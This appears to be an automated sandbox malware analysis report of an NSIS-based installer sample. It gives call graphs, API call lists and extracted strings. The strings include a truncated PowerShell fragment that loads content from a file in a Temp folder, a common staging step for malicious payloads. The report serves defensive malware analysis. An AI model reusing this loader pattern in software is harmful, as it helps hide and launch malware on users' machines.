4013cb MulDiv SendMessageW 3361->3362 3362->3361 3364 401389 2 API calls 3363->3364 3365 401420 3364->3365 3365->3307 3367 4041e1 SendMessageW 3366->3367 3368 4041db 3366->3368 3367->3315 3368->3367 3370 404325 3369->3370 3371 40427a GetWindowLongW 3369->3371 3370->3308 3371->3370 3372 40428f 3371->3372 3372->3370 3373 4042bc GetSysColor 3372->3373 3374 4042bf 3372->3374 3373->3374 3375 4042c5 SetTextColor 3374->3375 3376 4042cf SetBkMode 3374->3376 3375->3376 3377 4042e7 GetSysColor 3376->3377 3378 4042ed 3376->3378 3377->3378 3379 4042f4 SetBkColor 3378->3379 3380 4042fe 3378->3380 3379->3380 3380->3370 3381 404311 DeleteObject 3380->3381 3382 404318 CreateBrushIndirect 3380->3382 3381->3382 3382->3370 3383 4015a3 3384 402c41 17 API calls 3383->3384 3385 4015aa SetFileAttributesW 3384->3385 3386 4015bc 3385->3386 4590 4046a5 4591 4046b5 4590->4591 4592 4046db 4590->4592 4593 4041fb 18 API calls 4591->4593 4594 404262 8 API calls 4592->4594 4596 4046c2 SetDlgItemTextW 4593->4596 4595 4046e7 4594->4595 4596->4592 4597 4029a8 4598 402c1f 17 API calls 4597->4598 4599 4029ae 4598->4599 4600 4029d5 4599->4600 4601 4029ee 4599->4601 4608 40288b 4599->4608 4602 4029da 4600->4602 4603 4029eb 4600->4603 4604 402a08 4601->4604 4605 4029f8 4601->4605 4611 406284 lstrcpynW 4602->4611 4603->4608 4612 4061cb wsprintfW 4603->4612 4607 4062a6 17 API calls 4604->4607 4606 402c1f 17 API calls 4605->4606 4606->4603 4607->4603 4611->4608 4612->4608 3508 40542b 3509 4055d5 3508->3509 3510 40544c GetDlgItem GetDlgItem GetDlgItem 3508->3510 3512 405606 3509->3512 3513 4055de GetDlgItem CreateThread CloseHandle 3509->3513 3553 404230 SendMessageW 3510->3553 3515 405631 3512->3515 3516 405656 3512->3516 3517 40561d ShowWindow ShowWindow 3512->3517 3513->3512 3556 4053bf OleInitialize 3513->3556 3514 4054bc 3522 4054c3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3514->3522 3518 405691 3515->3518 3519 405645 3515->3519 3520 40566b ShowWindow 3515->3520 3521 404262 8 API calls 3516->3521 3555 404230 SendMessageW 3517->3555 3518->3516 3530 40569f SendMessageW 3518->3530 3524 4041d4 SendMessageW 3519->3524 3526 40568b 3520->3526 3527 40567d 3520->3527 3525 405664 3521->3525 3528 405531 3522->3528 3529 405515 SendMessageW SendMessageW 3522->3529 3524->3516 3532 4041d4 SendMessageW 3526->3532 3531 4052ec 24 API calls 3527->3531 3533 405544 3528->3533 3534 405536 SendMessageW 3528->3534 3529->3528 3530->3525 3535 4056b8 CreatePopupMenu 3530->3535 3531->3526 3532->3518 3537 4041fb 18 API calls 3533->3537 3534->3533 3536 4062a6 17 API calls 3535->3536 3539 4056c8 AppendMenuW 3536->3539 3538 405554 3537->3538 3542 405591 GetDlgItem SendMessageW 3538->3542 3543 40555d ShowWindow 3538->3543 3540 4056e5 GetWindowRect 3539->3540 3541 4056f8 TrackPopupMenu 3539->3541 3540->3541 3541->3525 3544 405713 3541->3544 3542->3525 3547 4055b8 SendMessageW SendMessageW 3542->3547 3545 405580 3543->3545 3546 405573 ShowWindow 3543->3546 3548 40572f SendMessageW 3544->3548 3554 404230 SendMessageW 3545->3554 3546->3545 3547->3525 3548->3548 3549 40574c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3548->3549 3551 405771 SendMessageW 3549->3551 3551->3551 3552 40579a GlobalUnlock SetClipboardData CloseClipboard 3551->3552 3552->3525 3553->3514 3554->3542 3555->3515 3557 404247 SendMessageW 3556->3557 3560 4053e2 3557->3560 3558 405409 3559 404247 SendMessageW 3558->3559 3561 40541b OleUninitialize 3559->3561 3560->3558 3562 401389 2 API calls 3560->3562 3562->3560 4620 4028ad 4621 402c41 17 API calls 4620->4621 4622 4028bb 4621->4622 4623 4028d1 4622->4623 4624 402c41 17 API calls 4622->4624 4625 405d55 2 API calls 4623->4625 4624->4623 4626 4028d7 4625->4626 4648 405d7a GetFileAttributesW CreateFileW 4626->4648 4628 4028e4 4629 4028f0 GlobalAlloc 4628->4629 4630 402987 4628->4630 4633 402909 4629->4633 4634 40297e CloseHandle 4629->4634 4631 4029a2 4630->4631 4632 40298f DeleteFileW 4630->4632 4632->4631 4649 403311 SetFilePointer 4633->4649 4634->4630 4636 40290f 4637 4032fb ReadFile 4636->4637 4638 402918 GlobalAlloc 4637->4638 4639 402928 4638->4639 4640 40295c 4638->4640 4641 403116 35 API calls 4639->4641 4642 405e2c WriteFile 4640->4642 4647 402935 4641->4647 4643 402968 GlobalFree 4642->4643 4644 403116 35 API calls 4643->4644 4645 40297b 4644->4645 4645->4634 4646 402953 GlobalFree 4646->4640 4647->4646 4648->4628 4649->4636 3676 4058b0 ShellExecuteExW 4650 401a30 4651 402c41 17 API calls 4650->4651 4652 401a39 ExpandEnvironmentStringsW 4651->4652 4653 401a4d 4652->4653 4655 401a60 4652->4655 4654 401a52 lstrcmpW 4653->4654 4653->4655 4654->4655 4656 404331 lstrcpynW lstrlenW 4657 402032 4658 402044 4657->4658 4659 4020f6 4657->4659 4660 402c41 17 API calls 4658->4660 4661 401423 24 API calls 4659->4661 4662 40204b 4660->4662 4668 402250 4661->4668 4663 402c41 17 API calls 4662->4663 4664 402054 4663->4664 4665 40206a LoadLibraryExW 4664->4665 4666 40205c GetModuleHandleW 4664->4666 4665->4659 4667 40207b 4665->4667 4666->4665 4666->4667 4677 4066cd WideCharToMultiByte 4667->4677 4671 4020c5 4673 4052ec 24 API calls 4671->4673 4672 40208c 4674 401423 24 API calls 4672->4674 4675 40209c 4672->4675 4673->4675 4674->4675 4675->4668 4676 4020e8 FreeLibrary 4675->4676 4676->4668 4678 4066f7 GetProcAddress 4677->4678 4679 402086 4677->4679 4678->4679 4679->4671 4679->4672 4680 403932 4681 40393d 4680->4681 4682 403944 GlobalAlloc 4681->4682 4683 403941 4681->4683 4682->4683 3682 401735 3683 402c41 17 API calls 3682->3683 3684 40173c SearchPathW 3683->3684 3685 401757 3684->3685 4689 402a35 4690 402c1f 17 API calls 4689->4690 4691 402a3b 4690->4691 4692 402a72 4691->4692 4693 40288b 4691->4693 4695 402a4d 4691->4695 4692->4693 4694 4062a6 17 API calls 4692->4694 4694->4693 4695->4693 4697 4061cb wsprintfW 4695->4697 4697->4693 4698 4014b8 4699 4014be 4698->4699 4700 401389 2 API calls 4699->4700 4701 4014c6 4700->4701 4702 401db9 GetDC 4703 402c1f 17 API calls 4702->4703 4704 401dcb GetDeviceCaps MulDiv ReleaseDC 4703->4704 4705 402c1f 17 API calls 4704->4705 4706 401dfc 4705->4706 4707 4062a6 17 API calls 4706->4707 4708 401e39 CreateFontIndirectW 4707->4708 4709 402592 4708->4709 4710 4043ba 4712 4044ec 4710->4712 4713 4043d2 4710->4713 4711 404556 4714 404620 4711->4714 4715 404560 GetDlgItem 4711->4715 4712->4711 4712->4714 4719 404527 GetDlgItem SendMessageW 4712->4719 4716 4041fb 18 API calls 4713->4716 4721 404262 8 API calls 4714->4721 4717 4045e1 4715->4717 4718 40457a 4715->4718 4720 404439 4716->4720 4717->4714 4726 4045f3 4717->4726 4718->4717 4725 4045a0 SendMessageW LoadCursorW SetCursor 4718->4725 4743 40421d KiUserCallbackDispatcher 4719->4743 4723 4041fb 18 API calls 4720->4723 4724 40461b 4721->4724 4728 404446 CheckDlgButton 4723->4728 4744 404669 4725->4744 4730 404609 4726->4730 4731 4045f9 SendMessageW 4726->4731 4727 404551 4733 404645 SendMessageW 4727->4733 4741 40421d KiUserCallbackDispatcher 4728->4741 4730->4724 4732 40460f SendMessageW 4730->4732 4731->4730 4732->4724 4733->4711 4736 404464 GetDlgItem 4742 404230 SendMessageW 4736->4742 4738 40447a SendMessageW 4739 4044a0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4738->4739 4740 404497 GetSysColor 4738->4740 4739->4724 4740->4739 4741->4736 4742->4738 4743->4727 4747 4058b0 ShellExecuteExW 4744->4747 4746 4045cf LoadCursorW SetCursor 4746->4717 4747->4746 4748 40283b 4749 402843 4748->4749 4750 402847 FindNextFileW 4749->4750 4753 402859 4749->4753 4751 4028a0 4750->4751 4750->4753 4754 406284 lstrcpynW 4751->4754 4754->4753

                                                                Executed Functions

                                                                Function 00403359 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410stringfilecomCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 403359-403396 SetErrorMode GetVersion 1 403398-4033a0 call 40665e 0->1 2 4033a9 0->2 1->2 7 4033a2 1->7 4 4033ae-4033c2 call 4065ee lstrlenA 2->4 9 4033c4-4033e0 call 40665e * 3 4->9 7->2 16 4033f1-403450 #17 OleInitialize SHGetFileInfoW call 406284 GetCommandLineW call 406284 9->16 17 4033e2-4033e8 9->17 24 403452-403459 16->24 25 40345a-403474 call 405b86 CharNextW 16->25 17->16 21 4033ea 17->21 21->16 24->25 28 40347a-403480 25->28 29 40358b-4035a5 GetTempPathW call 403328 25->29 30 403482-403487 28->30 31 403489-40348d 28->31 38 4035a7-4035c5 GetWindowsDirectoryW lstrcatW call 403328 29->38 39 4035fd-403617 DeleteFileW call 402edd 29->39 30->30 30->31 33 403494-403498 31->33 34 40348f-403493 31->34 36 403557-403564 call 405b86 33->36 37 40349e-4034a4 33->37 34->33 52 403566-403567 36->52 53 403568-40356e 36->53 42 4034a6-4034ae 37->42 43 4034bf-4034f8 37->43 38->39 58 4035c7-4035f7 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403328 38->58 54 4036c8-4036d8 call 40389a OleUninitialize 39->54 55 40361d-403623 39->55 47 4034b0-4034b3 42->47 48 4034b5 42->48 49 403515-40354f 43->49 50 4034fa-4034ff 43->50 47->43 47->48 48->43 49->36 57 403551-403555 49->57 50->49 56 403501-403509 50->56 52->53 53->28 59 403574 53->59 75 4037fe-403804 54->75 76 4036de-4036ee call 4058ea ExitProcess 54->76 60 4036b8-4036bf call 403974 55->60 61 403629-403634 call 405b86 55->61 63 403510 56->63 64 40350b-40350e 56->64 57->36 65 403576-403584 call 406284 57->65 58->39 58->54 68 403589 59->68 74 4036c4 60->74 79 403682-40368c 61->79 80 403636-40366b 61->80 63->49 64->49 64->63 65->68 68->29 74->54 77 403882-40388a 75->77 78 403806-40381c GetCurrentProcess OpenProcessToken 75->78 85 403890-403894 ExitProcess 77->85 86 40388c 77->86 82 403852-403860 call 40665e 78->82 83 40381e-40384c LookupPrivilegeValueW AdjustTokenPrivileges 78->83 87 4036f4-403708 call 405855 lstrcatW 79->87 88 40368e-40369c call 405c61 79->88 84 40366d-403671 80->84 102 403862-40386c 82->102 103 40386e-403879 ExitWindowsEx 82->103 83->82 92 403673-403678 84->92 93 40367a-40367e 84->93 86->85 100 403715-40372f lstrcatW lstrcmpiW 87->100 101 40370a-403710 lstrcatW 87->101 88->54 99 40369e-4036b4 call 406284 * 2 88->99 92->93 98 403680 92->98 93->84 93->98 98->79 99->60 100->54 105 403731-403734 100->105 101->100 102->103 106 40387b-40387d call 40140b 102->106 103->77 103->106 108 403736-40373b call 4057bb 105->108 109 40373d call 405838 105->109 106->77 117 403742-403750 SetCurrentDirectoryW 108->117 109->117 118 403752-403758 call 406284 117->118 119 40375d-403786 call 406284 117->119 118->119 123 40378b-4037a7 call 4062a6 DeleteFileW 119->123 126 4037e8-4037f0 123->126 127 4037a9-4037b9 CopyFileW 123->127 126->123 129 4037f2-4037f9 call 40604a 126->129 127->126 128 4037bb-4037db call 40604a call 4062a6 call 40586d 127->128 128->126 138 4037dd-4037e4 CloseHandle 128->138 129->54 138->126
                                                                APIs
                                                                • SetErrorMode.KERNELBASE ref: 0040337C
                                                                • GetVersion.KERNEL32 ref: 00403382
                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
                                                                • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
                                                                • OleInitialize.OLE32(00000000), ref: 004033F9
                                                                • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
                                                                • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00000020,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462
                                                                  • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                  • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D5
                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
                                                                • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602
                                                                  • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
                                                                • ExitProcess.KERNEL32 ref: 004036EE
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\TVPfW4WUdj.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
                                                                • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,"$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.S,00000008,?,00000006,00000008,0000000A), ref: 0040379D
                                                                • CopyFileW.KERNEL32(00438800,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 004037B1
                                                                • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
                                                                • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403814
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
                                                                • ExitProcess.KERNEL32 ref: 00403894
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                • String ID: "$Filicoid=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Defaulting19.Met';$Karikeringerne78=$Filicoid.S$"C:\Users\user\Desktop\TVPfW4WUdj.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\depersonaliseredes$C:\Users\user\AppData\Local\Temp\depersonaliseredes\prioritetsrkkeflgerne$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                • API String ID: 3441113951-3063262666
                                                                • Opcode ID: b19ebecd6ca5737548316411bb107f2a7d046da96c0e713e32cea02ef9e1e94b
                                                                • Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
                                                                • Opcode Fuzzy Hash: b19ebecd6ca5737548316411bb107f2a7d046da96c0e713e32cea02ef9e1e94b
                                                                • Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E
                                                                Function 0040542B Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 139 40542b-405446 140 4055d5-4055dc 139->140 141 40544c-405513 GetDlgItem * 3 call 404230 call 404b89 GetClientRect GetSystemMetrics SendMessageW * 2 139->141 143 405606-405613 140->143 144 4055de-405600 GetDlgItem CreateThread CloseHandle 140->144 163 405531-405534 141->163 164 405515-40552f SendMessageW * 2 141->164 146 405631-40563b 143->146 147 405615-40561b 143->147 144->143 151 405691-405695 146->151 152 40563d-405643 146->152 149 405656-40565f call 404262 147->149 150 40561d-40562c ShowWindow * 2 call 404230 147->150 160 405664-405668 149->160 150->146 151->149 157 405697-40569d 151->157 153 405645-405651 call 4041d4 152->153 154 40566b-40567b ShowWindow 152->154 153->149 161 40568b-40568c call 4041d4 154->161 162 40567d-405686 call 4052ec 154->162 157->149 165 40569f-4056b2 SendMessageW 157->165 161->151 162->161 168 405544-40555b call 4041fb 163->168 169 405536-405542 SendMessageW 163->169 164->163 170 4057b4-4057b6 165->170 171 4056b8-4056e3 CreatePopupMenu call 4062a6 AppendMenuW 165->171 178 405591-4055b2 GetDlgItem SendMessageW 168->178 179 40555d-405571 ShowWindow 168->179 169->168 170->160 176 4056e5-4056f5 GetWindowRect 171->176 177 4056f8-40570d TrackPopupMenu 171->177 176->177 177->170 180 405713-40572a 177->180 178->170 183 4055b8-4055d0 SendMessageW * 2 178->183 181 405580 179->181 182 405573-40557e ShowWindow 179->182 184 40572f-40574a SendMessageW 180->184 185 405586-40558c call 404230 181->185 182->185 183->170 184->184 186 40574c-40576f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->178 188 405771-405798 SendMessageW 186->188 188->188 189 40579a-4057ae GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                                                APIs
                                                                • GetDlgItem.USER32(?,00000403), ref: 00405489
                                                                • GetDlgItem.USER32(?,000003EE), ref: 00405498
                                                                • GetClientRect.USER32(?,?), ref: 004054D5
                                                                • GetSystemMetrics.USER32(00000002), ref: 004054DC
                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
                                                                • ShowWindow.USER32(?,00000008), ref: 00405578
                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405599
                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
                                                                • GetDlgItem.USER32(?,000003F8), ref: 004054A7
                                                                  • Part of subcall function 00404230: SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                • GetDlgItem.USER32(?,000003EC), ref: 004055EB
                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
                                                                • CloseHandle.KERNELBASE(00000000), ref: 00405600
                                                                • ShowWindow.USER32(00000000), ref: 00405624
                                                                • ShowWindow.USER32(?,00000008), ref: 00405629
                                                                • ShowWindow.USER32(00000008), ref: 00405673
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
                                                                • CreatePopupMenu.USER32 ref: 004056B8
                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
                                                                • GetWindowRect.USER32(?,?), ref: 004056EC
                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
                                                                • OpenClipboard.USER32(00000000), ref: 0040574D
                                                                • EmptyClipboard.USER32 ref: 00405753
                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
                                                                • GlobalLock.KERNEL32(00000000), ref: 00405769
                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040579D
                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
                                                                • CloseClipboard.USER32 ref: 004057AE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                • String ID: {$6B
                                                                • API String ID: 590372296-3705917127
                                                                • Opcode ID: ed459c3b0bc3866f5c1ebcdd147b2ed2301770daeddf159f08537acbff253c4e
                                                                • Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
                                                                • Opcode Fuzzy Hash: ed459c3b0bc3866f5c1ebcdd147b2ed2301770daeddf159f08537acbff253c4e
                                                                • Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68
                                                                Function 0040698E Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 698 40698e-406993 699 406a04-406a22 698->699 700 406995-4069c4 698->700 703 406ffa-40700f 699->703 701 4069c6-4069c9 700->701 702 4069cb-4069cf 700->702 704 4069db-4069de 701->704 705 4069d1-4069d5 702->705 706 4069d7 702->706 707 407011-407027 703->707 708 407029-40703f 703->708 709 4069e0-4069e9 704->709 710 4069fc-4069ff 704->710 705->704 706->704 711 407042-407049 707->711 708->711 712 4069eb 709->712 713 4069ee-4069fa 709->713 716 406bd1-406bef 710->716 714 407070-40707c 711->714 715 40704b-40704f 711->715 712->713 719 406a64-406a92 713->719 724 406812-40681b 714->724 720 407055-40706d 715->720 721 4071fe-407208 715->721 717 406bf1-406c05 716->717 718 406c07-406c19 716->718 723 406c1c-406c26 717->723 718->723 726 406a94-406aac 719->726 727 406aae-406ac8 719->727 720->714 725 407214-407227 721->725 729 406c28 723->729 730 406bc9-406bcf 723->730 731 406821 724->731 732 407229 724->732 733 40722c-407230 725->733 728 406acb-406ad5 726->728 727->728 735 406adb 728->735 736 406a4c-406a52 728->736 737 406ba4-406ba8 729->737 738 406d39-406d46 729->738 730->716 734 406b6d-406b77 730->734 739 406828-40682c 731->739 740 406968-406989 731->740 741 4068cd-4068d1 731->741 742 40693d-406941 731->742 732->733 750 4071bc-4071c6 734->750 751 406b7d-406b9f 734->751 760 406a31-406a49 735->760 761 407198-4071a2 735->761 752 406b05-406b0b 736->752 753 406a58-406a5e 736->753 754 4071b0-4071ba 737->754 755 406bae-406bc6 737->755 738->724 746 406d95-406da4 738->746 739->725 747 406832-40683f 739->747 740->703 744 4068d7-4068f0 741->744 745 40717d-407187 741->745 748 406947-40695b 742->748 749 40718c-407196 742->749 759 4068f3-4068f7 744->759 745->725 746->703 747->732 758 406845-40688b 747->758 762 40695e-406966 748->762 749->725 750->725 751->738 756 406b69 752->756 757 406b0d-406b2b 752->757 753->719 753->756 754->725 755->730 756->734 764 406b43-406b55 757->764 765 406b2d-406b41 757->765 766 4068b3-4068b5 758->766 767 40688d-406891 758->767 759->741 763 4068f9-4068ff 759->763 760->736 761->725 762->740 762->742 773 406901-406908 763->773 774 406929-40693b 763->774 768 406b58-406b62 764->768 765->768 771 4068c3-4068cb 766->771 772 4068b7-4068c1 766->772 769 406893-406896 GlobalFree 767->769 770 40689c-4068aa GlobalAlloc 767->770 768->752 777 406b64 768->777 769->770 770->732 778 4068b0 770->778 771->759 772->771 772->772 775 406913-406923 GlobalAlloc 773->775 776 40690a-40690d GlobalFree 773->776 774->762 775->732 775->774 776->775 780 4071a4-4071ae 777->780 781 406aea-406b02 777->781 778->766 780->725 781->752
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
